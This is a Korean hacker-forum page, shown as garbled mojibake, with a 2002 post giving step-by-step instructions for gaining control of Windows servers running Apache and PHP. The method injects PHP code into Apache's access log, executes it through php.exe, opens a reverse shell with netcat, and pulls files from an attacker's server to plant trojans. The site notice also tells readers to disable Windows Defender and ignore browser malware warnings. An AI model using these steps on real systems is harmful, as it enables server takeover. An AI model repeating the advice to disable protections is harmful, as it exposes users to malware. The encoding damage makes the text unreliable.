ÇØÄ¿Áî´º½º / ÇØÄ¿´ëÇÐ

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡
¡¡

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡

°øÁö

¡¡

1. MS ¿§Áö ºê¶ó¿ìÀú¿¡¼­ÀÇ °æ°íâÀº 'À©µµ¿ì µðÆæ´õ'¸¦ ²ô½Ã¸é µË´Ï´Ù.

             'À©µµ¿ì µðÆæ´õ ²ô±â'

2. Å©·Ò ºê¶ó¿ìÀú·Î Á¢¼Ó½Ã ³ª¿À´Â ¾Ç¼ºÄÚµå °æ°íâÀº ±¸±Û Å©·ÒÀÇ ¿¡·¯, Áï ¿ÀŽ(ŽÁö ¿À·ù)À̹ǷΠ¹«½ÃÇÏ½Ã¸é µË´Ï´Ù.

3. ÀÌ »çÀÌÆ®´Â ¾ÈÀüÇÏ¸ç ±ú²ýÇÏ´Ù´Â °ÍÀ» ¾Ë·Á µå¸³´Ï´Ù.

4. ¹«°íÇÑ »çÀÌÆ®µé¿¡ ´ëÇÑ °ø·æ ±â¾÷ ºê¶ó¿ìÀúµéÀÇ ¹«Â÷º°ÀûÀÎ 'ŽÁö ¿À·ù ȾÆ÷'°¡ »ç¿ëÀÚµéÀÇ Á¤º¸ °øÀ¯ÀÇ ÀÚÀ¯¸¦ ħÇØÇÏ°í ÀÖ½À´Ï´Ù. ÀÌ¿¡ ´ëÀÀÇÏ¿© ÀÌ ±â¾÷µéÀ» »ó´ë·Î ¼Ò¼ÛÀ» ÁغñÇÏ°í ÀÖ½À´Ï´Ù.

¡¡




2002/5/24(±Ý)
Á¶È¸: 4343
[À©µµ 2K]PHP.exe¸¦ ÅëÇÏ¿© ·çÆ®·Î ±ÇÇÑ È¹µæ  
¸î´ÞÀüÀÇ ¹ö±×Áö¸¸ Áö±Ýµµ »ó´çÈ÷ ¸ÔÈü´Ï´Ù.

º¸¾È À¯Áö¿¡ ½ÉÇ÷À» ±â¿ïÀÏ ¶§ÀÔ´Ï´Ù.

=================================

ÁÖ¿äÇÑ º¸¾È Ãë¾àÁ¡Àº À©µµ¿ìÁî¿ë PHP¿¡ ¹ß°ßµÇ¾ú´Ù. ±× Ãë¾àÁ¡Àº ¾ÇÀÇ ÀÖ´Â PHP ±âº»¸í·É¾î¸¦
¾Æ
ÆÄÄ¡ ·Î±× ÆÄÀÏ·Î »ðÀÔÇÏ´Â °ÍÀ¸·Î ÀÓÀÇ Äڵ带 ½ÇÇàÇϱâ À§ÇÏ¿© Ç¥ÁØ HTML ·çÆ® µð·ºÅ丮ÀÇ ¹Û
¿¡
Á¸ÀçÇÑ ÆÄÀϵéÀ» º¼ PHPÀÇ ´É·ÂÀ» °³¹ßÇÑ °ø°ÝÀÚ¸¦ Çã¿ëÇÑ´Ù.

Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Â ½Ã½ºÅÛµé : ¾ÆÆÄÄ¡ ¼­¹ö ¹öÁ¯2.0À¸·Î PHP ¹öÁ¯4.0 .

ÀͽºÇ÷ÎÀÕ(¸í·ÉÀ» ½ÇÇàÇÏ´Â °Í) : »ç¿ëÀÚ°¡ À§Ä¡ " c:\apache "¿¡ ¾ÆÆÄÄ¡¸¦ ¼³Ä¡ÇÏ¿´´ø °Í°ú ±×
¸®
°í php.exe°¡ c:\php\php.exeÀÇ ±âº» °æ·Î¿¡¼­ ¼³Ä¡µÇ¿´´Ù°í °¡Á¤ÇÏÀÚ.·çÆ®¸¦ ȹµæÇϱâ À§ÇÑ
´Ü°è
´Â ´ÙÀ½°ú °°´Ù.

ºê¶ó¿ìÀú¿¡ , ¾Æ·¡¿Í °°ÀÌ ÀÔ·ÂÇÑ´Ù:

1) http://www.example.com/('thecommandtoexecutewithpath');%20?>.

¾ÆÆÄÄ¡´Â access.logÆÄÀÏ¿¡ ¿äû¶óÀÎÀ» Ãß°¡ÇÒ °ÍÀÌ´Ù.
php.exe php.exe¸¦ °¡Áø ·Î±× ÆÄÀÏÀÇ ¿äû¿¡ ÀÇÇÏ¿© ÀÌ°Í°ú °°ÀÌ php ½Ã½ºÅÛ Äڵ带 ±¸µ¿ÇÒ¼ö
ÀÖ
´Ù.


2 ) http://www.example.com/php/php.exe?c:\apache\logs\access.log
ÀÌ°ÍÀº À§¿¡¼­ ¾ð±ÞµÈ php Äڵ带 ½ÇÇàÇÒ °ÍÀÌ´Ù.
·çÆ®°¡ ȹµæµÇ¾î Áö´Â ÀÌ ¹æ¹ýÀº webserver°¡ ¾Æ·¡¿Í °°Àº¸í·É netcat¸¦ ½ÇÇàÇÑ ´ç½ÅÀÇ ¼­¹ö¿¡
¸®
¹ö½º telnet Çϵµ·Ï ÇÏ´Â °ÍÀÌ´Ù.

" nc - l - n - v - p "

¿©±â¼­ º¼¼ö ÀÖµíÀÌ, php.exe ÀͽºÇ÷ÎÀÕÀ» °¡Áö°í Àüü ¼­¹ö¿¡ ŸÇùÇÏ´Â °ÍÀº ¸Å¿ì °£´ÜÇÑ ÀÏÀÌ
´Ù.
ÀͽºÇ÷ÎÀÌ ¾÷·Îµå Çϱâ : 1) mytestfile.txt¶ó´Â ÅؽºÆ® ÆÄÀÏÀ» ´ç½ÅÀÇ À¥¼­¹ö¿¡ ¸¸µç´Ù.


2) ±×°ÍÀÇ ¾È¿¡ ÀÖ´Â ÅؽºÆ®ÀÇ ÂªÀº ÇàÀ» ½á¶ó.

3) ¾ó¸¶³ª ±× ÆÄÀÏÀÌ (¹ÙÀÌÆ®¿¡) Å©°Ô ÀÎÁö¸¦ È®ÀÎÇÏ¿©¶ó.

4) ±× ÆÄÀÏÀÌ http://[YOUR_SERVER_IP]/mytestfile.txt¸¦ ÀÔ·ÂÇÏ´Â °Í¿¡ ÀÇÇؼ­ ´ç½ÅÀÇ ºê¶ó¿ì
Àú
¸¦ ÅëÇÏ¿© Á¢±ÙµÉ ¼ö ÀÖ´ÂÁö¸¦ È®ÀÎÇ϶ó .

5) ±× ÆÄÀÏÀÌ ´ç½ÅÀÇ ºê¶ó¿ìÀú·Î http://www.example.com/mytestfile.txt¸¦ ÀÔ·ÂÇÏ´Â °ÍÀ¸·Î ¼­
¹ö
¿¡ Á¸ÀçÇÏ´Â °ÍÀ» È®ÀÎÇ϶ó.

6) ´ç½ÅÀº Áö±Ý 4¹ø À»(¸¸¾à ±× ºê¶ó¿ìÀú°¡ ¿¬°áÇÏ´Â °Íó·³ º¸ÀÌÁö ¾ÊÀ¸¸é, °ÆÁ¤ÇÏÁö ¸»¶ó

7) ´ç½ÅÀÇ ºê¶ó¿ìÀú http://www.example.com/ [YOUR_SERVER_IP]/mytestfile.txt"," rb) ¿äûÇ϶ó. .


8) ´ë·« 10 Ãʵ¿¾È ´ë±â .


9) ºê¶ó¿ìÀú¿¡http://www.example.com/ [REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?> ¿äûÇ϶ó

10) ´ë·« 10 Ãʸ¦ ±â´Ù¸®¾î ÁֽʽÿÀ!.


11) ´ç½ÅÀÇ ºê¶ó¿ìÀú http://www.example.com/ ("c:/Apache2/htdocs/mytestfile.txt","wb");?>¿¡ ¿äûÇ϶ó.

12) ´ë·« 10 ÃÊ µ¿¾È ´ë±âÇÑ´Ù.


13) ´ç½ÅÀÇ ºê¶ó¿ìÀú¿¡http://www.example.com/¿äûÇ϶ó.


14) ´ë·« 10 Ãʸ¦ ±â´Ù¸®¾î ÁֽʽÿÀ!.

15) http://www.example.com/nonexistantfile.htmÀ» ÀÔ·ÂÇϴ°ÍÀ¸·Î ½ÇÀçÇÏÁö ¾ÊÀº ÆÄÀÏÀ»(Á¢
±Ù
·Î±×¸¦ ³ÑÄ¡°Ô Çϱâ À§ÇÏ¿©) À§ÇØ ¿äûÀ» ÇÑ´Ù.

16) ´ë·« 10 Ãʸ¦ ±â´Ù¸®¾î ÁֽʽÿÀ!.

17) php.exe°¡ http://www.example.com/php/php.exe?c:\apache2\logs\access.logÀ»
ÀÔ·ÂÇÏ´Â
°ÍÀ¸·Î ¾ÆÆÄÄ¡logfile¸¦ ÆĽÌÇÏ°Ô ÇÑ´Ù.

18) ±× ·Î±× ÆÄÀÏÀÌ ÆĽ̵ǵµ·Ï È®½ÇÈ÷ ÇÏ´Â Refresh¸¦ ´©¸¥´Ù.

19) ´ç½ÅÀÇ ºê¶ó¿ìÀú¿¡ http://www.example.com/mytestfile.txtÀ» ÀÔ·ÂÇÏ¿© ¼­¹öÀÇ ÆÄÀÏÀ» È®ÀÎ
ÇÑ
´Ù.



Æ®·ÎÀ̸ñ¸¶ exe ÆÄÀÏ, php ÆÄÀÏÀ» ¾÷·Îµå ÇÒ¼ö ÀÖ´Ù.¾÷·Îµå ÆÄÀÏÀÇ Á¦ÇÑÀÌ ¾ø´Ù. µû¶ó¼­ ÀÌ·¯ÇÑ
µ¿
ÀÛÀ» ÀÌ¿ëÇÏ¿© ¾ó¸¶µçÁö ¾ÇÀÇÀûÀÎÇàÀ§³ª Æ®·ÎÀÌ ¸ñ¸¶¸¦ ¼³Ä¡ÇÒ¼ö ÀÖ´Ù.
                    ¼öÁ¤/»èÁ¦     ÀÌÀü±Û ´ÙÀ½±Û    
¹øÈ£±¸ºÐÀ帣Á¦ ¸ñÀÛ¼ºÀÏ
15       [Ãßõ ÆÁ]À©µµ¿ì ¹Ìµð¾î Ç÷¹À̾î VTVó·³ »ç¿ëÇϱâ 05/26-06:05
14       [Ãßõ ÆÁ]À©ÀÚü °øÀ¯ Ŭ¶óÀ̾ðÆ® ip¿¡¼­ ftp-±¸·ç±¸·ç ¼­¹öµ¹¸®... 05/25-06:20
13       [À©µµ 2K]PHP.exe¸¦ ÅëÇÏ¿© ·çÆ®·Î ±ÇÇÑ È¹µæ 05/24-06:29
12       [Ãßõ Åø]³» ÄÄÇ»ÅͼÓÀÇ ºÒû°´.... 05/23-07:59
11       [À©µµ XP]À©µµ¿ìxp ÀνºÅç½Ã¿¡ sxs.dll ¿À·ù¿¡ °üÇÑÆÁ 05/22-06:54
10       [À©µµ XP]³×Æ®¿÷ xp¿Í 95&98 °øÀ¯ À߾ȵɶ§ 05/21-03:56

 
óÀ½ ÀÌÀü ´ÙÀ½       ¸ñ·Ï